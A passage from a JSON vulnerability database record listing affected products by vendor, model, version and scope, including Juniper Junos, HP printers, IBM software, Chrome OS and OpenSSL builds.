        "vendor": "avaya",
        "version": "6.2"
      },
      {
        "model": "oceanstor s5500t v100r005",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "videoscape anyres live",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.66"
      },
      {
        "model": "junos d20",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "12.1x46"
      },
      {
        "model": "color laserjet cm4540 mfp cc419a 2302963 436067",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": null
      },
      {
        "model": "junos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "4.3"
      },
      {
        "model": "storevirtual 450gb china sas storage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "433012.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.31"
      },
      {
        "model": "vcenter converter standalone",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "5.5"
      },
      {
        "model": "infosphere master data management patient hub",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.0"
      },
      {
        "model": "epolicy orchestrator",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mcafee",
        "version": "4.6.4"
      },
      {
        "model": "hsr6602 family",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "wag310g wireless-g adsl2+ gateway with voip",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "documentum content server p07",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "emc",
        "version": "7.1"
      },
      {
        "model": "project openssl",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "openssl",
        "version": "1.0"
      },
      {
        "model": "sterling connect:enterprise for unix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.44"
      },
      {
        "model": "security threat response manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "2012.1"
      },
      {
        "model": "jabber for android",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "image construction and composition tool",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2.1.1"
      },
      {
        "model": "unified wireless ip phone series",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "29200"
      },
      {
        "model": "one-x mobile for blackberry",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "0"
      },
      {
        "model": "junos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "9.5"
      },
      {
        "model": "integrated management module ii",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.50"
      },
      {
        "model": "9.0-release-p6",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.14"
      },
      {
        "model": "laserjet m4345 multifunction printer cb425a",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "5.0.6"
      },
      {
        "model": "websphere datapower soa appliance",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.07"
      },
      {
        "model": "storevirtual 1tb mdl sas storage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "433012.0"
      },
      {
        "model": "ida pro",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hex ray",
        "version": "6.5"
      },
      {
        "model": "aura system manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.2"
      },
      {
        "model": "chrome for android",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0"
      },
      {
        "model": "big-ip edge gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.1"
      },
      {
        "model": "mysql",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "5.6.8"
      },
      {
        "model": "junos space 14.1r1",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "storevirtual 600gb sas storage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "473012.6"
      },
      {
        "model": "upward integration modules for vmware vsphere",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.5"
      },
      {
        "model": "junos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "11.4x27.44"
      },
      {
        "model": "prime optical for sps",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.9.2"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.22"
      },
      {
        "model": "9.2-rc2",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "storevirtual 900gb sas storage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "433011.5"
      },
      {
        "model": "color laserjet m651 cz255a 2302963 436073",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": null
      },
      {
        "model": "si switch series",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "51200"
      },
      {
        "model": "scanjet enterprise document capture workstation l2717a 2302963 436065",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "8500"
      },
      {
        "model": "websphere cast iron cloud integration",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.19"
      },
      {
        "model": "laserjet p4015 cb510a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "4.213.1"
      },
      {
        "model": "flare experience for microsoft windows",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "1.1.5"
      },
      {
        "model": "initiate master data service",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.5"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.99"
      },
      {
        "model": "cognos metrics manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.2"
      },
      {
        "model": "aura system manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.1.1"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.168"
      },
      {
        "model": "icewall sso agent option",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "8.02007"
      },
      {
        "model": "cloudsystem foundation",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "8.0.2"
      },
      {
        "model": "9.0-rc3",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "junos 13.3r2-s2",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "open systems snapvault",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.41"
      },
      {
        "model": "junos 12.1r5",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "security network intrusion prevention system gx4004-v2",
        "scope": null,
        "trust": 0.3,
        "vendor": "ibm",
        "version": null
      },
      {
        "model": "documentum content server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "emc",
        "version": "7.1"
      },
      {
        "model": "vcd",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "5.6.2"
      },
      {
        "model": "system type",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "x3850x638370"
      },
      {
        "model": "storevirtual 600gb sas storage/s-buy",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "453012.6"
      },
      {
        "model": "smart call home",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "elan",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "8.3.3"
      },
      {
        "model": "oncommand unified manager core package",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.2"
      },
      {
        "model": "xenclient enterprise",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "5.0.1"
      },
      {
        "model": "project openssl beta5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "openssl",
        "version": "1.0.0"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "4.1.3"
      },
      {
        "model": "laserjet enterprise color mfp m575dn cd645a",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "5000"
      },
      {
        "model": "big-ip edge gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.4"
      },
      {
        "model": "system x3250m3 type",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "42511.42"
      },
      {
        "model": "junos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "7.3"
      },
      {
        "model": "insight control server deployment",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.2.0"
      },
      {
        "model": "laserjet enterprise m806 cz245a 2302963 436075",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": null
      },
      {
        "model": "storevirtual 3tb mdl sas storage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "453012.5"
      },
      {
        "model": "fortimanager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "3.0"
      },
      {
        "model": "linerate",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "2.2.4"
      },
      {
        "model": "suse core for",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "s u s e",
        "version": "9x86"
      },
      {
        "model": "ecns610 v100r003c00",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "big-ip wom",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.1.0"
      },
      {
        "model": "sdk for node.js",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.1.0.3"
      },
      {
        "model": "big-ip gtm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2"
      },
      {
        "model": "junos 13.2r5",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "documentum content server sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "emc",
        "version": "6.7"
      },
      {
        "model": "horizon workspace server data",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "1.8.1"
      },
      {
        "model": "chrome for android",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025308"
      },
      {
        "model": "9.0-rc1",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "aura messaging",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.2"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.81"
      },
      {
        "model": "storage encryption",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "netapp",
        "version": "0"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.1.4"
      },
      {
        "model": "laserjet m3027 multifunction printer cb416a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "48.306.1"
      },
      {
        "model": "storevirtual china hybrid san solution",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "433511.5"
      },
      {
        "model": "chrome for android",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1700.99"
      },
      {
        "model": "junos 12.3r6",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.108"
      },
      {
        "model": "xenclient enterprise",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "5.1.3"
      },
      {
        "model": "vios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2.0.13"
      },
      {
        "model": "laserjet enterprise mfp m630 series b3g84a 2303714 233000041",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": null
      },
      {
        "model": "netscaler ipmi/lom interface",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "0"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "6.2"
      },
      {
        "model": "8.4-release-p8",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "msr20 family",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "colorqube ps",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "xerox",
        "version": "85704.76.0"
      },
      {
        "model": "sylpheed",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sylpheed",
        "version": "0.9.9"
      },
      {
        "model": "oceanstor s6800t v100r002",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "color laserjet m680 cz249a 2302963 436072",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": null
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.62"
      },
      {
        "model": "servicecenter",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "6.2"
      },
      {
        "model": "bladesystem c-class virtual connect",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "4.30"
      },
      {
        "model": "sparc m10-4s",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "0"
      },
      {
        "model": "fortiauthenticator build",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "3.1.060"
      },
      {
        "model": "laserjet enterprise m601 series ce990a 2302963 436082",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "600"
      },
      {
        "model": "switch series",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "129000"
      },
      {
        "model": "snapdrive for unix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.1"
      },
      {
        "model": "vcenter support assistant",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "5.5"
      },
      {
        "model": "junos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "5.4"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.14"
      },
      {
        "model": "enterprise linux workstation",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "6"
      },
      {
        "model": "chrome for android",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0"
      },
      {
        "model": "sbr carrier 7.6.0-r10",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.56"
      },
      {
        "model": "hsr6800 family",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "laserjet printer series q7552a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "52008.241"
      },
      {
        "model": "scanjet enterprise document capture workstation l2717a",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "85000"
      },
      {
        "model": "project openssl 0.9.8m beta1",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.39"
      },
      {
        "model": "clearpass",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "arubanetworks",
        "version": "6.3.0"
      },
      {
        "model": "bladecenter js23/js43",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "(7778-23x)0"
      },
      {
        "model": "enterprise linux desktop client",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "5"
      },
      {
        "model": "junos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "6.1"
      },
      {
        "model": "splunk",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "splunk",
        "version": "4.3"
      },
      {
        "model": "tivoli storage productivity center",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.2.1.185"
      },
      {
        "model": "security network intrusion prevention system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.4"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.2"
      },
      {
        "model": "project openssl 0.9.8q",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "sterling connect:express for unix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.5.0.11"
      },
      {
        "model": "laserjet printer series q3721a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "9040/90508.260.3"
      },
      {
        "model": "flex system fabric en4093 10gb scalable switch",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.8.4.0"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "5.0.5"
      },
      {
        "model": "manageone v100r002c10 spc320",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "mysql",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "5.6.10"
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "freebsd",
        "version": "9.2"
      },
      {
        "model": "svn2200 v200r001c01spc600",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "rational application developer for websphere",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.1.0.1"
      },
      {
        "model": "aura presence services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.1"
      },
      {
        "model": "messagesight server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.1"
      },
      {
        "model": "secblade iii",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "safe profile",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f secure",
        "version": "0"
      },
      {
        "model": "jabber software development kit",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "integrated management module ii",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.79"
      },
      {
        "model": "junos 13.1r3",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "junos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "8.0"
      },
      {
        "model": "laserjet m5035 multifunction printer q7830a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "48.306.1"
      },
      {
        "model": "jetdirect 640n eio card j8025a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "45.35"
      },
      {
        "model": "junos 13.2r5",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "big-ip aam",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4.1"
      },
      {
        "model": "storwize unified",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70001.4"
      },
      {
        "model": "scale out network attached storage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.3.2.2"
      },
      {
        "model": "vdi-in-a-box",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "5.4.4"
      },
      {
        "model": "itbm standard",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "1.0"
      },
      {
        "model": "websphere datapower soa appliance",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.00"
      },
      {
        "model": "tivoli storage productivity center",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.1.1.2"
      },
      {
        "model": "ssl for openvms",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "1.4-467"
      },
      {
        "model": "color laserjet cp3525 cc469a",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "junos 13.1r4-s2",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "junos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "5.2"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "3.1.11"
      },
      {
        "model": "fortivoiceos build",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "3.0.3165"
      },
      {
        "model": "laserjet enterprise color m551 series cf082a 2302963 436083",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "500"
      },
      {
        "model": "secure analytics",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "2013.2"
      },
      {
        "model": "storevirtual 900gb sas storage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "473011.5"
      },
      {
        "model": "flare experience for microsoft windows",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "1.1.4"
      },
      {
        "model": "eupp v100r001c10",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "web gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mcafee",
        "version": "7.3.2"
      },
      {
        "model": "security network intrusion prevention system gx6116",
        "scope": null,
        "trust": 0.3,
        "vendor": "ibm",
        "version": null
      },
      {
        "model": "flex system fabric si4093 system interconnect module",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.8.4.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.17"
      },
      {
        "model": "big-ip edge gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.1"
      },
      {
        "model": "laserjet printer series q3722a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "9040/90508.260.3"
      },
      {
        "model": "sterling connect:direct for microsoft windows",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.5.00"
      },
      {
        "model": "junos pulse 5.0r1",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.14"
      },
      {
        "model": "aura application enablement services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.1.2"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.2.22"
      },
      {
        "model": "telepresence system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "13000"
      },
      {
        "model": "enterprise linux eus 5.9.z server",
        "scope": null,
        "trust": 0.3,
        "vendor": "redhat",
        "version": null
      },
      {
        "model": "communications policy management",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "9.7.3"
      },
      {
        "model": "laserjet p4515 cb516a",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "linerate",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "2.2.3"
      },
      {
        "model": "uma-db v2r1coospc101",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "security information and event management hf6",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "mcafee",
        "version": "9.2.2"
      },
      {
        "model": "management center",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "1.2"
      },
      {
        "model": "project openssl 0.9.8g",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "telepresence exchange system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "datafort management console",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "netapp",
        "version": "0"
      },
      {
        "model": "cms r17",
        "scope": null,
        "trust": 0.3,
        "vendor": "avaya",
        "version": null
      },
      {
        "model": "usg9300 usg9300 v100r003c00",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "websphere datapower xml security gateway xs40",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.05"
      },
      {
        "model": "scale out network attached storage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.3.2"
      },
      {
        "model": "f1000e family",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "7"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.113"
      },
      {
        "model": "laserjet enterprise m601 series ce989a 2302963 436082",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "600"
      },
      {
        "model": "sterling file gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2"
      },
      {
        "model": "oncommand unified manager core package 5.2.1p1",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": null
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "freebsd",
        "version": "9.0"
      },
      {
        "model": "junos 11.4r6.6",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.40"
      },
      {
        "model": "family",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "19200"
      },
      {
        "model": "junos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "5.3"
      },
      {
        "model": "color laserjet cm4540 mfp cc419a",
        "scope": null,
        "trust": 0.3,
        "vendor": "hp",
        "version": null
      },
      {
        "model": "smart analytics system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7600-"
      },
      {
        "model": "blackberry enterprise service",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "rim",
        "version": "10.1.3"
      },
      {
        "model": "vsphere replication",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "5.6"
      },
      {
        "model": "espace u2990 v200r001c02",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "msr93x russian version",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "big-ip edge gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.1"
      },
      {
        "model": "airwave",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "arubanetworks",
        "version": "0"
      },
      {
        "model": "rational reporting for development intelligence",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.01"
      },
      {
        "model": "big data extensions",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "1.1"
      },
      {
        "model": "storevirtual 3tb mdl sas storage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "453012.6"
      },
      {
        "model": "linux arm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "10.04"
      },
      {
        "model": "junos space 12.3r1.3",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "dsr-1000n rev. a1",
        "scope": null,
        "trust": 0.3,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "mysql",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "5.6.19"
      },
      {
        "model": "junos 11.2r1",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "svn5500 v200r001c01spc600",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "msr50 russian version",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "blackberry os",
